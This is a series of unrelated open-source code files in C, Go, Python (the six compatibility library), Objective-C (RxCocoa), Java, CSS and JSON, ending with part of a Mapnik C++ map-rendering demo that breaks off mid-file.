U8G_ESC_CS(1), /* enable chip */
0x0a4, /* all points off */
0x0af, /* display on */
U8G_ESC_DLY(50), /* delay 50 ms */
U8G_ESC_CS(1), /* disable chip */
U8G_ESC_END /* end of sequence */
};
uint8_t u8g_dev_st7565_64128n_fn(u8g_t *u8g, u8g_dev_t *dev, uint8_t msg, void *arg)
{
switch(msg)
{
case U8G_DEV_MSG_INIT:
u8g_InitCom(u8g, dev);
u8g_WriteEscSeqP(u8g, dev, u8g_dev_st7565_64128n_init_seq);
break;
case U8G_DEV_MSG_STOP:
break;
case U8G_DEV_MSG_PAGE_NEXT:
{
u8g_pb_t *pb = (u8g_pb_t *)(dev->dev_mem);
u8g_WriteEscSeqP(u8g, dev, u8g_dev_st7565_64128n_data_start);
u8g_WriteByte(u8g, dev, 0x0b0 | pb->p.page); /* select current page (ST7565R) */
u8g_SetAddress(u8g, dev, 1); /* data mode */
if ( u8g_pb_WriteBuffer(pb, u8g, dev) == 0 )
return 0;
u8g_SetChipSelect(u8g, dev, 0);
}
break;
case U8G_DEV_MSG_CONTRAST:
u8g_SetChipSelect(u8g, dev, 1);
u8g_SetAddress(u8g, dev, 0); /* instruction mode */
u8g_WriteByte(u8g, dev, 0x081);
u8g_WriteByte(u8g, dev, (*(uint8_t *)arg) >> 2);
u8g_SetChipSelect(u8g, dev, 0);
return 1;
case U8G_DEV_MSG_SLEEP_ON:
u8g_WriteEscSeqP(u8g, dev, u8g_dev_st7565_64128n_sleep_on);
return 1;
case U8G_DEV_MSG_SLEEP_OFF:
u8g_WriteEscSeqP(u8g, dev, u8g_dev_st7565_64128n_sleep_off);
return 1;
}
return u8g_dev_pb8v1_base_fn(u8g, dev, msg, arg);
}
U8G_PB_DEV(u8g_dev_st7565_64128n_sw_spi, WIDTH, HEIGHT, PAGE_HEIGHT, u8g_dev_st7565_64128n_fn, U8G_COM_SW_SPI);
U8G_PB_DEV(u8g_dev_st7565_64128n_hw_spi, WIDTH, HEIGHT, PAGE_HEIGHT, u8g_dev_st7565_64128n_fn, U8G_COM_HW_SPI);
| {
"pile_set_name": "Github"
} |
package objects
import "github.com/gophercloud/gophercloud"
// ErrWrongChecksum is the error when the checksum generated for an object
// doesn't match the ETAG header.
type ErrWrongChecksum struct {
gophercloud.BaseError
}
func (e ErrWrongChecksum) Error() string {
return "Local checksum does not match API ETag header"
}
| {
"pile_set_name": "Github"
} |
<!--pages/mainStore/mainStore.wxml-->
<text>pages/mainStore/mainStore.wxml</text>
| {
"pile_set_name": "Github"
} |
"""Utilities for writing code that runs on Python 2 and 3"""
# Copyright (c) 2010-2013 Benjamin Peterson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import operator
import sys
import types
__author__ = "Benjamin Peterson <[email protected]>"
__version__ = "1.4.1"
# Useful for very coarse version differentiation.
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
if PY3:
string_types = str,
integer_types = int,
class_types = type,
text_type = str
binary_type = bytes
MAXSIZE = sys.maxsize
else:
string_types = basestring,
integer_types = (int, long)
class_types = (type, types.ClassType)
text_type = unicode
binary_type = str
if sys.platform.startswith("java"):
# Jython always uses 32 bits.
MAXSIZE = int((1 << 31) - 1)
else:
# It's possible to have sizeof(long) != sizeof(Py_ssize_t).
class X(object):
def __len__(self):
return 1 << 31
try:
len(X())
except OverflowError:
# 32-bit
MAXSIZE = int((1 << 31) - 1)
else:
# 64-bit
MAXSIZE = int((1 << 63) - 1)
del X
def _add_doc(func, doc):
"""Add documentation to a function."""
func.__doc__ = doc
def _import_module(name):
"""Import module, returning the module after the last dot."""
__import__(name)
return sys.modules[name]
class _LazyDescr(object):
def __init__(self, name):
self.name = name
def __get__(self, obj, tp):
result = self._resolve()
setattr(obj, self.name, result)
# This is a bit ugly, but it avoids running this again.
delattr(tp, self.name)
return result
class MovedModule(_LazyDescr):
def __init__(self, name, old, new=None):
super(MovedModule, self).__init__(name)
if PY3:
if new is None:
new = name
self.mod = new
else:
self.mod = old
def _resolve(self):
return _import_module(self.mod)
class MovedAttribute(_LazyDescr):
def __init__(self, name, old_mod, new_mod, old_attr=None, new_attr=None):
super(MovedAttribute, self).__init__(name)
if PY3:
if new_mod is None:
new_mod = name
self.mod = new_mod
if new_attr is None:
if old_attr is None:
new_attr = name
else:
new_attr = old_attr
self.attr = new_attr
else:
self.mod = old_mod
if old_attr is None:
old_attr = name
self.attr = old_attr
def _resolve(self):
module = _import_module(self.mod)
return getattr(module, self.attr)
class _MovedItems(types.ModuleType):
"""Lazy loading of moved objects"""
_moved_attributes = [
MovedAttribute("cStringIO", "cStringIO", "io", "StringIO"),
MovedAttribute("filter", "itertools", "builtins", "ifilter", "filter"),
MovedAttribute("filterfalse", "itertools", "itertools", "ifilterfalse", "filterfalse"),
MovedAttribute("input", "__builtin__", "builtins", "raw_input", "input"),
MovedAttribute("map", "itertools", "builtins", "imap", "map"),
MovedAttribute("range", "__builtin__", "builtins", "xrange", "range"),
MovedAttribute("reload_module", "__builtin__", "imp", "reload"),
MovedAttribute("reduce", "__builtin__", "functools"),
MovedAttribute("StringIO", "StringIO", "io"),
MovedAttribute("UserString", "UserString", "collections"),
MovedAttribute("xrange", "__builtin__", "builtins", "xrange", "range"),
MovedAttribute("zip", "itertools", "builtins", "izip", "zip"),
MovedAttribute("zip_longest", "itertools", "itertools", "izip_longest", "zip_longest"),
MovedModule("builtins", "__builtin__"),
MovedModule("configparser", "ConfigParser"),
MovedModule("copyreg", "copy_reg"),
MovedModule("http_cookiejar", "cookielib", "http.cookiejar"),
MovedModule("http_cookies", "Cookie", "http.cookies"),
MovedModule("html_entities", "htmlentitydefs", "html.entities"),
MovedModule("html_parser", "HTMLParser", "html.parser"),
MovedModule("http_client", "httplib", "http.client"),
MovedModule("email_mime_multipart", "email.MIMEMultipart", "email.mime.multipart"),
MovedModule("email_mime_text", "email.MIMEText", "email.mime.text"),
MovedModule("email_mime_base", "email.MIMEBase", "email.mime.base"),
MovedModule("BaseHTTPServer", "BaseHTTPServer", "http.server"),
MovedModule("CGIHTTPServer", "CGIHTTPServer", "http.server"),
MovedModule("SimpleHTTPServer", "SimpleHTTPServer", "http.server"),
MovedModule("cPickle", "cPickle", "pickle"),
MovedModule("queue", "Queue"),
MovedModule("reprlib", "repr"),
MovedModule("socketserver", "SocketServer"),
MovedModule("tkinter", "Tkinter"),
MovedModule("tkinter_dialog", "Dialog", "tkinter.dialog"),
MovedModule("tkinter_filedialog", "FileDialog", "tkinter.filedialog"),
MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"),
MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"),
MovedModule("tkinter_tix", "Tix", "tkinter.tix"),
MovedModule("tkinter_constants", "Tkconstants", "tkinter.constants"),
MovedModule("tkinter_dnd", "Tkdnd", "tkinter.dnd"),
MovedModule("tkinter_colorchooser", "tkColorChooser",
"tkinter.colorchooser"),
MovedModule("tkinter_commondialog", "tkCommonDialog",
"tkinter.commondialog"),
MovedModule("tkinter_tkfiledialog", "tkFileDialog", "tkinter.filedialog"),
MovedModule("tkinter_font", "tkFont", "tkinter.font"),
MovedModule("tkinter_messagebox", "tkMessageBox", "tkinter.messagebox"),
MovedModule("tkinter_tksimpledialog", "tkSimpleDialog",
"tkinter.simpledialog"),
MovedModule("urllib_parse", __name__ + ".moves.urllib_parse", "urllib.parse"),
MovedModule("urllib_error", __name__ + ".moves.urllib_error", "urllib.error"),
MovedModule("urllib", __name__ + ".moves.urllib", __name__ + ".moves.urllib"),
MovedModule("urllib_robotparser", "robotparser", "urllib.robotparser"),
MovedModule("winreg", "_winreg"),
]
for attr in _moved_attributes:
setattr(_MovedItems, attr.name, attr)
del attr
moves = sys.modules[__name__ + ".moves"] = _MovedItems(__name__ + ".moves")
class Module_six_moves_urllib_parse(types.ModuleType):
"""Lazy loading of moved objects in six.moves.urllib_parse"""
_urllib_parse_moved_attributes = [
MovedAttribute("ParseResult", "urlparse", "urllib.parse"),
MovedAttribute("parse_qs", "urlparse", "urllib.parse"),
MovedAttribute("parse_qsl", "urlparse", "urllib.parse"),
MovedAttribute("urldefrag", "urlparse", "urllib.parse"),
MovedAttribute("urljoin", "urlparse", "urllib.parse"),
MovedAttribute("urlparse", "urlparse", "urllib.parse"),
MovedAttribute("urlsplit", "urlparse", "urllib.parse"),
MovedAttribute("urlunparse", "urlparse", "urllib.parse"),
MovedAttribute("urlunsplit", "urlparse", "urllib.parse"),
MovedAttribute("quote", "urllib", "urllib.parse"),
MovedAttribute("quote_plus", "urllib", "urllib.parse"),
MovedAttribute("unquote", "urllib", "urllib.parse"),
MovedAttribute("unquote_plus", "urllib", "urllib.parse"),
MovedAttribute("urlencode", "urllib", "urllib.parse"),
]
for attr in _urllib_parse_moved_attributes:
setattr(Module_six_moves_urllib_parse, attr.name, attr)
del attr
sys.modules[__name__ + ".moves.urllib_parse"] = Module_six_moves_urllib_parse(__name__ + ".moves.urllib_parse")
sys.modules[__name__ + ".moves.urllib.parse"] = Module_six_moves_urllib_parse(__name__ + ".moves.urllib.parse")
class Module_six_moves_urllib_error(types.ModuleType):
"""Lazy loading of moved objects in six.moves.urllib_error"""
_urllib_error_moved_attributes = [
MovedAttribute("URLError", "urllib2", "urllib.error"),
MovedAttribute("HTTPError", "urllib2", "urllib.error"),
MovedAttribute("ContentTooShortError", "urllib", "urllib.error"),
]
for attr in _urllib_error_moved_attributes:
setattr(Module_six_moves_urllib_error, attr.name, attr)
del attr
sys.modules[__name__ + ".moves.urllib_error"] = Module_six_moves_urllib_error(__name__ + ".moves.urllib_error")
sys.modules[__name__ + ".moves.urllib.error"] = Module_six_moves_urllib_error(__name__ + ".moves.urllib.error")
class Module_six_moves_urllib_request(types.ModuleType):
"""Lazy loading of moved objects in six.moves.urllib_request"""
_urllib_request_moved_attributes = [
MovedAttribute("urlopen", "urllib2", "urllib.request"),
MovedAttribute("install_opener", "urllib2", "urllib.request"),
MovedAttribute("build_opener", "urllib2", "urllib.request"),
MovedAttribute("pathname2url", "urllib", "urllib.request"),
MovedAttribute("url2pathname", "urllib", "urllib.request"),
MovedAttribute("getproxies", "urllib", "urllib.request"),
MovedAttribute("Request", "urllib2", "urllib.request"),
MovedAttribute("OpenerDirector", "urllib2", "urllib.request"),
MovedAttribute("HTTPDefaultErrorHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPRedirectHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPCookieProcessor", "urllib2", "urllib.request"),
MovedAttribute("ProxyHandler", "urllib2", "urllib.request"),
MovedAttribute("BaseHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPPasswordMgr", "urllib2", "urllib.request"),
MovedAttribute("HTTPPasswordMgrWithDefaultRealm", "urllib2", "urllib.request"),
MovedAttribute("AbstractBasicAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPBasicAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("ProxyBasicAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("AbstractDigestAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPDigestAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("ProxyDigestAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPSHandler", "urllib2", "urllib.request"),
MovedAttribute("FileHandler", "urllib2", "urllib.request"),
MovedAttribute("FTPHandler", "urllib2", "urllib.request"),
MovedAttribute("CacheFTPHandler", "urllib2", "urllib.request"),
MovedAttribute("UnknownHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPErrorProcessor", "urllib2", "urllib.request"),
MovedAttribute("urlretrieve", "urllib", "urllib.request"),
MovedAttribute("urlcleanup", "urllib", "urllib.request"),
MovedAttribute("URLopener", "urllib", "urllib.request"),
MovedAttribute("FancyURLopener", "urllib", "urllib.request"),
]
for attr in _urllib_request_moved_attributes:
setattr(Module_six_moves_urllib_request, attr.name, attr)
del attr
sys.modules[__name__ + ".moves.urllib_request"] = Module_six_moves_urllib_request(__name__ + ".moves.urllib_request")
sys.modules[__name__ + ".moves.urllib.request"] = Module_six_moves_urllib_request(__name__ + ".moves.urllib.request")
class Module_six_moves_urllib_response(types.ModuleType):
"""Lazy loading of moved objects in six.moves.urllib_response"""
_urllib_response_moved_attributes = [
MovedAttribute("addbase", "urllib", "urllib.response"),
MovedAttribute("addclosehook", "urllib", "urllib.response"),
MovedAttribute("addinfo", "urllib", "urllib.response"),
MovedAttribute("addinfourl", "urllib", "urllib.response"),
]
for attr in _urllib_response_moved_attributes:
setattr(Module_six_moves_urllib_response, attr.name, attr)
del attr
sys.modules[__name__ + ".moves.urllib_response"] = Module_six_moves_urllib_response(__name__ + ".moves.urllib_response")
sys.modules[__name__ + ".moves.urllib.response"] = Module_six_moves_urllib_response(__name__ + ".moves.urllib.response")
class Module_six_moves_urllib_robotparser(types.ModuleType):
"""Lazy loading of moved objects in six.moves.urllib_robotparser"""
_urllib_robotparser_moved_attributes = [
MovedAttribute("RobotFileParser", "robotparser", "urllib.robotparser"),
]
for attr in _urllib_robotparser_moved_attributes:
setattr(Module_six_moves_urllib_robotparser, attr.name, attr)
del attr
sys.modules[__name__ + ".moves.urllib_robotparser"] = Module_six_moves_urllib_robotparser(__name__ + ".moves.urllib_robotparser")
sys.modules[__name__ + ".moves.urllib.robotparser"] = Module_six_moves_urllib_robotparser(__name__ + ".moves.urllib.robotparser")
class Module_six_moves_urllib(types.ModuleType):
"""Create a six.moves.urllib namespace that resembles the Python 3 namespace"""
parse = sys.modules[__name__ + ".moves.urllib_parse"]
error = sys.modules[__name__ + ".moves.urllib_error"]
request = sys.modules[__name__ + ".moves.urllib_request"]
response = sys.modules[__name__ + ".moves.urllib_response"]
robotparser = sys.modules[__name__ + ".moves.urllib_robotparser"]
sys.modules[__name__ + ".moves.urllib"] = Module_six_moves_urllib(__name__ + ".moves.urllib")
def add_move(move):
"""Add an item to six.moves."""
setattr(_MovedItems, move.name, move)
def remove_move(name):
"""Remove item from six.moves."""
try:
delattr(_MovedItems, name)
except AttributeError:
try:
del moves.__dict__[name]
except KeyError:
raise AttributeError("no such move, %r" % (name,))
if PY3:
_meth_func = "__func__"
_meth_self = "__self__"
_func_closure = "__closure__"
_func_code = "__code__"
_func_defaults = "__defaults__"
_func_globals = "__globals__"
_iterkeys = "keys"
_itervalues = "values"
_iteritems = "items"
_iterlists = "lists"
else:
_meth_func = "im_func"
_meth_self = "im_self"
_func_closure = "func_closure"
_func_code = "func_code"
_func_defaults = "func_defaults"
_func_globals = "func_globals"
_iterkeys = "iterkeys"
_itervalues = "itervalues"
_iteritems = "iteritems"
_iterlists = "iterlists"
try:
advance_iterator = next
except NameError:
def advance_iterator(it):
return it.next()
next = advance_iterator
try:
callable = callable
except NameError:
def callable(obj):
return any("__call__" in klass.__dict__ for klass in type(obj).__mro__)
if PY3:
def get_unbound_function(unbound):
return unbound
create_bound_method = types.MethodType
Iterator = object
else:
def get_unbound_function(unbound):
return unbound.im_func
def create_bound_method(func, obj):
return types.MethodType(func, obj, obj.__class__)
class Iterator(object):
def next(self):
return type(self).__next__(self)
callable = callable
_add_doc(get_unbound_function,
"""Get the function out of a possibly unbound function""")
get_method_function = operator.attrgetter(_meth_func)
get_method_self = operator.attrgetter(_meth_self)
get_function_closure = operator.attrgetter(_func_closure)
get_function_code = operator.attrgetter(_func_code)
get_function_defaults = operator.attrgetter(_func_defaults)
get_function_globals = operator.attrgetter(_func_globals)
def iterkeys(d, **kw):
"""Return an iterator over the keys of a dictionary."""
return iter(getattr(d, _iterkeys)(**kw))
def itervalues(d, **kw):
"""Return an iterator over the values of a dictionary."""
return iter(getattr(d, _itervalues)(**kw))
def iteritems(d, **kw):
"""Return an iterator over the (key, value) pairs of a dictionary."""
return iter(getattr(d, _iteritems)(**kw))
def iterlists(d, **kw):
"""Return an iterator over the (key, [values]) pairs of a dictionary."""
return iter(getattr(d, _iterlists)(**kw))
if PY3:
def b(s):
return s.encode("latin-1")
def u(s):
return s
unichr = chr
if sys.version_info[1] <= 1:
def int2byte(i):
return bytes((i,))
else:
# This is about 2x faster than the implementation above on 3.2+
int2byte = operator.methodcaller("to_bytes", 1, "big")
byte2int = operator.itemgetter(0)
indexbytes = operator.getitem
iterbytes = iter
import io
StringIO = io.StringIO
BytesIO = io.BytesIO
else:
def b(s):
return s
def u(s):
return unicode(s, "unicode_escape")
unichr = unichr
int2byte = chr
def byte2int(bs):
return ord(bs[0])
def indexbytes(buf, i):
return ord(buf[i])
def iterbytes(buf):
return (ord(byte) for byte in buf)
import StringIO
StringIO = BytesIO = StringIO.StringIO
_add_doc(b, """Byte literal""")
_add_doc(u, """Text literal""")
if PY3:
import builtins
exec_ = getattr(builtins, "exec")
def reraise(tp, value, tb=None):
if value.__traceback__ is not tb:
raise value.with_traceback(tb)
raise value
print_ = getattr(builtins, "print")
del builtins
else:
def exec_(_code_, _globs_=None, _locs_=None):
"""Execute code in a namespace."""
if _globs_ is None:
frame = sys._getframe(1)
_globs_ = frame.f_globals
if _locs_ is None:
_locs_ = frame.f_locals
del frame
elif _locs_ is None:
_locs_ = _globs_
exec("""exec _code_ in _globs_, _locs_""")
exec_("""def reraise(tp, value, tb=None):
raise tp, value, tb
""")
def print_(*args, **kwargs):
"""The new-style print function."""
fp = kwargs.pop("file", sys.stdout)
if fp is None:
return
def write(data):
if not isinstance(data, basestring):
data = str(data)
fp.write(data)
want_unicode = False
sep = kwargs.pop("sep", None)
if sep is not None:
if isinstance(sep, unicode):
want_unicode = True
elif not isinstance(sep, str):
raise TypeError("sep must be None or a string")
end = kwargs.pop("end", None)
if end is not None:
if isinstance(end, unicode):
want_unicode = True
elif not isinstance(end, str):
raise TypeError("end must be None or a string")
if kwargs:
raise TypeError("invalid keyword arguments to print()")
if not want_unicode:
for arg in args:
if isinstance(arg, unicode):
want_unicode = True
break
if want_unicode:
newline = unicode("\n")
space = unicode(" ")
else:
newline = "\n"
space = " "
if sep is None:
sep = space
if end is None:
end = newline
for i, arg in enumerate(args):
if i:
write(sep)
write(arg)
write(end)
_add_doc(reraise, """Reraise an exception.""")
def with_metaclass(meta, *bases):
"""Create a base class with a metaclass."""
return meta("NewBase", bases, {})
def add_metaclass(metaclass):
"""Class decorator for creating a class with a metaclass."""
def wrapper(cls):
orig_vars = cls.__dict__.copy()
orig_vars.pop('__dict__', None)
orig_vars.pop('__weakref__', None)
for slots_var in orig_vars.get('__slots__', ()):
orig_vars.pop(slots_var)
return metaclass(cls.__name__, cls.__bases__, orig_vars)
return wrapper
| {
"pile_set_name": "Github"
} |
//
// _RXDelegateProxy.m
// RxCocoa
//
// Created by Krunoslav Zaher on 7/4/15.
// Copyright © 2015 Krunoslav Zaher. All rights reserved.
//
#import "include/_RXDelegateProxy.h"
#import "include/_RX.h"
#import "include/_RXObjCRuntime.h"
@interface _RXDelegateProxy () {
id __weak __forwardToDelegate;
}
@property (nonatomic, strong) id strongForwardDelegate;
@end
static NSMutableDictionary *voidSelectorsPerClass = nil;
@implementation _RXDelegateProxy
+(NSSet*)collectVoidSelectorsForProtocol:(Protocol *)protocol {
NSMutableSet *selectors = [NSMutableSet set];
unsigned int protocolMethodCount = 0;
struct objc_method_description *pMethods = protocol_copyMethodDescriptionList(protocol, NO, YES, &protocolMethodCount);
for (unsigned int i = 0; i < protocolMethodCount; ++i) {
struct objc_method_description method = pMethods[i];
if (RX_is_method_with_description_void(method)) {
[selectors addObject:SEL_VALUE(method.name)];
}
}
free(pMethods);
unsigned int numberOfBaseProtocols = 0;
Protocol * __unsafe_unretained * pSubprotocols = protocol_copyProtocolList(protocol, &numberOfBaseProtocols);
for (unsigned int i = 0; i < numberOfBaseProtocols; ++i) {
[selectors unionSet:[self collectVoidSelectorsForProtocol:pSubprotocols[i]]];
}
free(pSubprotocols);
return selectors;
}
+(void)initialize {
@synchronized (_RXDelegateProxy.class) {
if (voidSelectorsPerClass == nil) {
voidSelectorsPerClass = [[NSMutableDictionary alloc] init];
}
NSMutableSet *voidSelectors = [NSMutableSet set];
#define CLASS_HIERARCHY_MAX_DEPTH 100
NSInteger classHierarchyDepth = 0;
Class targetClass = NULL;
for (classHierarchyDepth = 0, targetClass = self;
classHierarchyDepth < CLASS_HIERARCHY_MAX_DEPTH && targetClass != nil;
++classHierarchyDepth, targetClass = class_getSuperclass(targetClass)
) {
unsigned int count;
Protocol *__unsafe_unretained *pProtocols = class_copyProtocolList(targetClass, &count);
for (unsigned int i = 0; i < count; i++) {
NSSet *selectorsForProtocol = [self collectVoidSelectorsForProtocol:pProtocols[i]];
[voidSelectors unionSet:selectorsForProtocol];
}
free(pProtocols);
}
if (classHierarchyDepth == CLASS_HIERARCHY_MAX_DEPTH) {
NSLog(@"Detected weird class hierarchy with depth over %d. Starting with this class -> %@", CLASS_HIERARCHY_MAX_DEPTH, self);
#if DEBUG
abort();
#endif
}
voidSelectorsPerClass[CLASS_VALUE(self)] = voidSelectors;
}
}
-(id)_forwardToDelegate {
return __forwardToDelegate;
}
-(void)_setForwardToDelegate:(id __nullable)forwardToDelegate retainDelegate:(BOOL)retainDelegate {
__forwardToDelegate = forwardToDelegate;
if (retainDelegate) {
self.strongForwardDelegate = forwardToDelegate;
}
else {
self.strongForwardDelegate = nil;
}
}
-(BOOL)hasWiredImplementationForSelector:(SEL)selector {
return [super respondsToSelector:selector];
}
-(BOOL)voidDelegateMethodsContain:(SEL)selector {
@synchronized(_RXDelegateProxy.class) {
NSSet *voidSelectors = voidSelectorsPerClass[CLASS_VALUE(self.class)];
NSAssert(voidSelectors != nil, @"Set of allowed methods not initialized");
return [voidSelectors containsObject:SEL_VALUE(selector)];
}
}
-(void)forwardInvocation:(NSInvocation *)anInvocation {
BOOL isVoid = RX_is_method_signature_void(anInvocation.methodSignature);
NSArray *arguments = nil;
if (isVoid) {
arguments = RX_extract_arguments(anInvocation);
[self _sentMessage:anInvocation.selector withArguments:arguments];
}
if (self._forwardToDelegate && [self._forwardToDelegate respondsToSelector:anInvocation.selector]) {
[anInvocation invokeWithTarget:self._forwardToDelegate];
}
if (isVoid) {
[self _methodInvoked:anInvocation.selector withArguments:arguments];
}
}
// abstract method
-(void)_sentMessage:(SEL)selector withArguments:(NSArray *)arguments {
}
// abstract method
-(void)_methodInvoked:(SEL)selector withArguments:(NSArray *)arguments {
}
-(void)dealloc {
}
@end
| {
"pile_set_name": "Github"
} |
/*
*
* Copyright (c) 2013 - 2020 Lijun Liao
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.xipki.scep.util;
/**
* SCEP constants.
*
* @author Lijun Liao
*/
public class ScepConstants {
public static final String CT_X509_NEXT_CA_CERT = "application/x-x509-next-ca-cert";
public static final String CT_X509_CA_CERT = "application/x-x509-ca-cert";
public static final String CT_X509_CA_RA_CERT = "application/x-x509-ca-ra-cert";
public static final String CT_PKI_MESSAGE = "application/x-pki-message";
public static final String CT_TEXT_PLAIN = "text/plain";
private ScepConstants() {
}
}
| {
"pile_set_name": "Github"
} |
a,b{p:v}
| {
"pile_set_name": "Github"
} |
{
"created_at": "2015-02-27T22:27:40.765097",
"description": "WoW 5.0 web-based Spreadsheet",
"fork": false,
"full_name": "cheald/shadowcraft-ui",
"language": "JavaScript",
"updated_at": "2015-02-27T23:41:45.722764"
} | {
"pile_set_name": "Github"
} |
/*****************************************************************************
*
* This file is part of Mapnik (c++ mapping toolkit)
*
* Copyright (C) 2017 Artem Pavlenko
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*
*****************************************************************************/
#include <mapnik/map.hpp>
#include <mapnik/layer.hpp>
#include <mapnik/rule.hpp>
#include <mapnik/feature_type_style.hpp>
#include <mapnik/symbolizer.hpp>
#include <mapnik/text/placements/dummy.hpp>
#include <mapnik/text/text_properties.hpp>
#include <mapnik/text/formatting/text.hpp>
#include <mapnik/datasource_cache.hpp>
#include <mapnik/font_engine_freetype.hpp>
#include <mapnik/agg_renderer.hpp>
#include <mapnik/expression.hpp>
#include <mapnik/color_factory.hpp>
#include <mapnik/image_util.hpp>
#include <mapnik/unicode.hpp>
#include <mapnik/save_map.hpp>
#include <mapnik/cairo_io.hpp>
#if defined(HAVE_CAIRO)
#include <mapnik/cairo/cairo_renderer.hpp>
#include <mapnik/cairo/cairo_image_util.hpp>
#endif
#include <iostream>
int main ( int, char** )
{
using namespace mapnik;
const std::string srs_lcc="+proj=lcc +ellps=GRS80 +lat_0=49 +lon_0=-95 +lat+1=49 +lat_2=77 +datum=NAD83 +units=m +no_defs";
const std::string srs_merc="+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0.0 +k=1.0 +units=m +nadgrids=@null +wktext +no_defs +over";
try {
std::cout << " running demo ... \n";
datasource_cache::instance().register_datasources("plugins/input/");
freetype_engine::register_font("fonts/dejavu-fonts-ttf-2.37/ttf/DejaVuSans.ttf");
Map m(800,600);
m.set_background(parse_color("white"));
m.set_srs(srs_merc);
// create styles
// Provinces (polygon)
feature_type_style provpoly_style;
provpoly_style.reserve(2); // prevent reallocation and copying in add_rule
{
rule r;
r.set_filter(parse_expression("[NAME_EN] = 'Ontario'"));
{
polygon_symbolizer poly_sym;
put(poly_sym, keys::fill, color(250, 190, 183));
r.append(std::move(poly_sym));
}
provpoly_style.add_rule(std::move(r));
}
{
rule r;
r.set_filter(parse_expression("[NOM_FR] = 'Québec'"));
{
polygon_symbolizer poly_sym;
put(poly_sym, keys::fill, color(217, 235, 203));
r.append(std::move(poly_sym));
}
provpoly_style.add_rule(std::move(r));
}
m.insert_style("provinces", std::move(provpoly_style));
// Provinces (polyline)
feature_type_style provlines_style;
{
rule r;
{
line_symbolizer line_sym;
put(line_sym,keys::stroke,color(0,0,0));
put(line_sym,keys::stroke_width,1.0);
dash_array dash;
dash.emplace_back(8,4);
dash.emplace_back(2,2);
dash.emplace_back(2,2);
put(line_sym,keys::stroke_dasharray,dash);
r.append(std::move(line_sym));
}
provlines_style.add_rule(std::move(r));
}
m.insert_style("provlines", std::move(provlines_style));
// Drainage
feature_type_style qcdrain_style;
{
rule r;
r.set_filter(parse_expression("[HYC] = 8"));
{
polygon_symbolizer poly_sym;
put(poly_sym, keys::fill, color(153, 204, 255));
r.append(std::move(poly_sym));
}
qcdrain_style.add_rule(std::move(r));
}
m.insert_style("drainage", std::move(qcdrain_style));
// Roads 3 and 4 (The "grey" roads)
feature_type_style roads34_style;
{
rule r;
r.set_filter(parse_expression("[CLASS] = 3 or [CLASS] = 4"));
{
line_symbolizer line_sym;
put(line_sym,keys::stroke,color(171,158,137));
put(line_sym,keys::stroke_width,2.0);
put(line_sym,keys::stroke_linecap,ROUND_CAP);
put(line_sym,keys::stroke_linejoin,ROUND_JOIN);
r.append(std::move(line_sym));
}
roads34_style.add_rule(std::move(r));
}
m.insert_style("smallroads", std::move(roads34_style));
// Roads 2 (The thin yellow ones)
feature_type_style roads2_style_1;
{
rule r;
r.set_filter(parse_expression("[CLASS] = 2"));
{
line_symbolizer line_sym;
put(line_sym,keys::stroke,color(171,158,137));
put(line_sym,keys::stroke_width,4.0);
put(line_sym,keys::stroke_linecap,ROUND_CAP);
put(line_sym,keys::stroke_linejoin,ROUND_JOIN);
r.append(std::move(line_sym));
}
roads2_style_1.add_rule(std::move(r));
}
m.insert_style("road-border", std::move(roads2_style_1));
feature_type_style roads2_style_2;
{
rule r;
r.set_filter(parse_expression("[CLASS] = 2"));
{
line_symbolizer line_sym;
put(line_sym,keys::stroke,color(255,250,115));
put(line_sym,keys::stroke_width,2.0);
put(line_sym,keys::stroke_linecap,ROUND_CAP);
put(line_sym,keys::stroke_linejoin,ROUND_JOIN);
r.append(std::move(line_sym));
}
roads2_style_2.add_rule(std::move(r));
}
m.insert_style("road-fill", std::move(roads2_style_2));
// Roads 1 (The big orange ones, the highways)
feature_type_style roads1_style_1;
{
rule r;
